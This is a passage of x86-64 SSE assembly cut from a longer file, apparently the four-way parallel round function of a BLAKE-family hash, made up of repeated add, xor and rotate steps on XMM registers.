pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x70]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x10]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0xD0]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x60]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xB0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x50]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xA0]
paddd xmm1, xmmword ptr [rsp+0xC0]
paddd xmm2, xmmword ptr [rsp+0xE0]
paddd xmm3, xmmword ptr [rsp+0xD0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0x30]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x40]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x50]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xC0]
paddd xmm1, xmmword ptr [rsp+0x90]
paddd xmm2, xmmword ptr [rsp+0xF0]
paddd xmm3, xmmword ptr [rsp+0xE0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0xA0]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0x70]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x20]
paddd xmm1, xmmword ptr [rsp+0x30]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x90]
paddd xmm1, xmmword ptr [rsp+0xB0]
paddd xmm2, xmmword ptr [rsp+0x80]
paddd xmm3, xmmword ptr [rsp+0xF0]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0xC0]
paddd xmm3, xmmword ptr [rsp+0x10]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xD0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x20]
paddd xmm3, xmmword ptr [rsp+0x40]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0x30]
paddd xmm1, xmmword ptr [rsp+0xA0]
paddd xmm2, xmmword ptr [rsp+0x60]
paddd xmm3, xmmword ptr [rsp+0x70]
paddd xmm0, xmm5
paddd xmm1, xmm6
paddd xmm2, xmm7
paddd xmm3, xmm4
pxor xmm15, xmm0
pxor xmm12, xmm1
pxor xmm13, xmm2
pxor xmm14, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm15, xmm8
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
paddd xmm10, xmm15
paddd xmm11, xmm12
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm13
paddd xmm9, xmm14
pxor xmm5, xmm10
pxor xmm6, xmm11
pxor xmm7, xmm8
pxor xmm4, xmm9
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
paddd xmm0, xmmword ptr [rsp+0xB0]
paddd xmm1, xmmword ptr [rsp+0x50]
paddd xmm2, xmmword ptr [rsp+0x10]
paddd xmm3, xmmword ptr [rsp+0x80]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT16+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 12
pslld xmm4, 20
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 12
pslld xmm5, 20
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 12
pslld xmm6, 20
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 12
pslld xmm7, 20
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xF0]
paddd xmm1, xmmword ptr [rsp]
paddd xmm2, xmmword ptr [rsp+0x90]
paddd xmm3, xmmword ptr [rsp+0x60]
paddd xmm0, xmm4
paddd xmm1, xmm5
paddd xmm2, xmm6
paddd xmm3, xmm7
pxor xmm12, xmm0
pxor xmm13, xmm1
pxor xmm14, xmm2
pxor xmm15, xmm3
movdqa xmm8, xmmword ptr [ROT8+rip]
pshufb xmm12, xmm8
pshufb xmm13, xmm8
pshufb xmm14, xmm8
pshufb xmm15, xmm8
movdqa xmm8, xmmword ptr [rsp+0x100]
paddd xmm8, xmm12
paddd xmm9, xmm13
paddd xmm10, xmm14
paddd xmm11, xmm15
pxor xmm4, xmm8
pxor xmm5, xmm9
pxor xmm6, xmm10
pxor xmm7, xmm11
movdqa xmmword ptr [rsp+0x100], xmm8
movdqa xmm8, xmm4
psrld xmm8, 7
pslld xmm4, 25
por xmm4, xmm8
movdqa xmm8, xmm5
psrld xmm8, 7
pslld xmm5, 25
por xmm5, xmm8
movdqa xmm8, xmm6
psrld xmm8, 7
pslld xmm6, 25
por xmm6, xmm8
movdqa xmm8, xmm7
psrld xmm8, 7
pslld xmm7, 25
por xmm7, xmm8
paddd xmm0, xmmword ptr [rsp+0xE0]
paddd xmm1, xmmword ptr [rsp+0x20]
paddd xmm2, xmmword ptr [rsp+0x30]
